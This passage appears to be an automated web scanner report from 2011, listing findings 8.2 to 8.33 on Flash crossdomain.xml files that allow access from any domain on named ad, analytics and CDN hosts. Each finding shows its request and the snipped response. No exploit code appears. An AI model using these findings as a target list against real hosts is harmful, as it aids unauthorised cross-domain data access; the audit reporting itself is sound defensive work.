<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
8.2. http://1.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 02 May 2011 02:48:11 GMT
Expires: Mon, 02 May 2011 02:53:11 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
8.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 01 May 2011 23:33:31 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
8.4. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 02 May 2011 02:20:09 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 02 May 2011 02:20:08 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
8.5. http://admeld.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:10:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
8.6. http://admonkey.dapper.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admonkey.dapper.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 02 May 2011 02:35:22 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 03 Aug 2010 09:20:10 GMT
ETag: "1b4b458-ca-48ce7d2dee680"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
8.7. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 02 May 2011 02:52:52 GMT
Date: Sun, 01 May 2011 02:52:52 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 84983

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
8.8. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 02 May 2011 23:34:41 GMT
Date: Sun, 01 May 2011 23:34:41 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
8.9. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205350000"
Last-Modified: Thu, 15 Jul 2010 14:49:10 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 02 May 2011 02:01:52 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
8.10. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

8.11. http://c.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Length: 107
Content-Type: text/xml
Last-Modified: Tue, 24 Feb 2009 17:22:30 GMT
Accept-Ranges: bytes
ETag: "ca58579a496c91:c8a"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: keep-alive

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
8.12. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 02 May 2011 02:10:39 GMT
Date: Mon, 02 May 2011 02:10:39 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
8.13. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "80468-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
8.14. http://dg.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dg.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 02 May 2011 02:04:37 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
8.15. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 02:09:18 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

8.16. http://edge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:a52"
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Mon, 02 May 2011 02:25:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 02:25:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...
8.17. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:07:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
8.18. http://l.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 06:42:04 GMT
Cache-Control: max-age=315360000
Expires: Wed, 28 Apr 2021 06:42:04 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:55 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 60671
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
8.19. http://loadm.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1405316268"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Mon, 02 May 2011 01:58:27 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>
8.20. http://loadus.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadus.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "2127011854"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>
8.21. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:28:33 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
8.22. http://map.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 02 May 2011 02:35:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
8.23. http://metrics.washingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.washingtonpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
xserver: www65
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
8.24. http://n4403ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://n4403ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: n4403ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 02 May 2011 01:58:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
8.25. http://pix01.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix01.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
8.26. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:28 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
8.27. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 03 May 2011 01:57:46 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 02 May 2011 01:57:46 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
8.28. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 02 May 2011 02:10:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 02 May 2011 02:10:37 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
8.29. http://resources.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: resources.infolinks.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=14400
Content-Type: text/xml
Date: Mon, 02 May 2011 02:27:36 GMT
ETag: "8c8ace-52-493eb73b9d9c0"
Expires: Mon, 02 May 2011 06:27:36 GMT
Last-Modified: Sun, 31 Oct 2010 15:36:15 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 82
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
8.30. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 01 May 2011 03:34:26 GMT
Expires: Sun, 01 May 2011 03:34:10 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 72005
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
8.31. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
8.32. http://t.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:10 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "184c003-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=300, max=11
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
8.33. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "2320194-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
